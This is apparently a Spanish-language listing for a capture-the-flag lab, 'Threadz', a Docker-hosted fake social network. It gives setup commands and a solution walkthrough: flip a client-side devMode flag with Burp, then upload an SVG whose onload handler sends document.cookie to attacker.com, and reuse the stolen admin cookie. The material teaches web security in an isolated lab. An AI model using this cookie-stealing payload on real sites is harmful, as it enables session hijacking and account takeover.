DifícilVDP40 min
Por @gorkaRed social tipo Threads donde un flag de devMode oculta la funcionalidad de subida de archivos. Activandolo via Burp se puede subir un SVG malicioso con JavaScript que roba la cookie de sesion del admin.
Entorno seguro y aislado
Crea una cuenta y suscríbete para acceder a todos los labs. Practica en un entorno real y seguro.
Cuando resuelvas este lab desbloqueas este logro compartible
# Opcion 1: autodeploy
./autodeploy.sh
# Opcion 2: manual
docker compose up --build
# Acceder
http://localhost:1600
Compatible con macOS, Linux y Windows (Docker Desktop / WSL).
Para parar:
./autodeploy.sh destroy
# o: docker compose down -v
Threadz es una red social con posts, feed publico y funcionalidades ocultas de desarrollo (upload SVG) protegidas solo por un flag del cliente.
La respuesta de login/register incluye devMode: false. El frontend oculta el boton de Upload si devMode es false. Modificando la respuesta a devMode: true, aparece la funcionalidad de subir SVGs. Los SVGs se renderizan con <object> (no <img>), permitiendo ejecucion de JavaScript. La cookie de auth NO es httpOnly, por lo que un SVG malicioso puede robarla.
1. Registrarse → devMode: false
2. Burp Match & Replace: devMode.*false → devMode.*true
3. Subir SVG: <svg onload=\"fetch('https://attacker.com/'+document.cookie)\">
4. Admin bot visita el SVG → Cookie robada
5. Usar cookie del admin → Acceso total
6. Flag en el panel
Accede a /writeup dentro de la aplicacion para una guia paso a paso con botones interactivos.
Suscríbete para descargar